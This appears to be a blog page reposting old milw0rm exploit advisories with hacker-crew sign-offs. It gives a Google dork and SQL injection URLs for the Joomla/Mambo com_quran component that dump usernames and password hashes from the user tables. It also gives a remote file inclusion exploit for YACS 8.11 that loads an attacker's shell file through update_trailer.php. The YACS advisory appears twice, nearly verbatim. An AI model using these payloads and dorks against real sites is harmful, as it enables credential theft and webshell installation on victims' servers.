inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz
# milw0rm.com [2008-02-15]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability
-----------------[remote file include]-----------------
script: YACS version 8.11
------------------------------------------------------------------
download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip
==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;
include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25
==============================================
dork: "Powered by yacs"
----------------------------------------------
xpl:
http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------
# milw0rm.com [2009-02-16]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
script: YACS version 8.11
------------------------------------------------------------------
download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip
==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;
include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25
==============================================
dork: "Powered by yacs"
----------------------------------------------
xpl:
http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------
# milw0rm.com [2009-02-16]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Thursday, February 12, 2009
Joomla and Mambo eWriting 1.2.1 Components - SQL injection
This summary is not available. Please
click here to view the post.
Subscribe to:
Posts (Atom)